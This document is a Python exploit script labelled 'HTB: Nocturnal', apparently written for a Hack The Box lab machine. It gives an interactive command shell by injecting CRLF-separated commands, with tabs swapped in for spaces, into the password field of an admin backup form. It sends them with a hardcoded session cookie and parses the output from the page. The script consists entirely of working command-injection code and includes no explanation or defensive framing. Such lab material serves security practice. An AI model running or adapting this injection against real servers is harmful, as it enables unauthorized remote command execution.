HTB: Nocturnal

a.py

import requests
import urllib.parse
import readline
from bs4 import BeautifulSoup
import re
from termcolor import colored

url = "http://nocturnal.htb/admin.php?view=admin.php"

headers = {
    "Host": "nocturnal.htb",
    "Cache-Control": "max-age=0",
    "Origin": "http://nocturnal.htb",
    "DNT": "1",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",                                                                                                                            "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7",
    "Cookie": "PHPSESSID=u1uj8soq9c93bv8icmk5c8i655",
}

while True:
    try:
        cmd = input(colored("shell> ", "cyan"))
        if cmd.strip().lower() in ["exit", "quit"]:
            break

        injected = f"test\r\n{cmd}>/dev/null\r\n"
        encoded_payload = "password=" + urllib.parse.quote(injected).replace('%20', '%09') + "&backup="
        response = requests.post(url, headers=headers, data=encoded_payload)
        soup = BeautifulSoup(response.text, "html.parser")
        output_div = soup.find("div", class_="backup-output")
        if output_div:
            pre = output_div.find("pre")
            if pre:
                raw = pre.text
                split_marker = ".zip: not found"
                if split_marker in raw:
                    _, result = raw.split(split_marker, 1)
                    print(result.strip())
                else:
                    print(raw.strip())
            else:
                print(colored("No <pre> tag found in backup-output.", "red"))
        else:
            print(colored("No backup-output div found.", "red"))
    except KeyboardInterrupt:
        break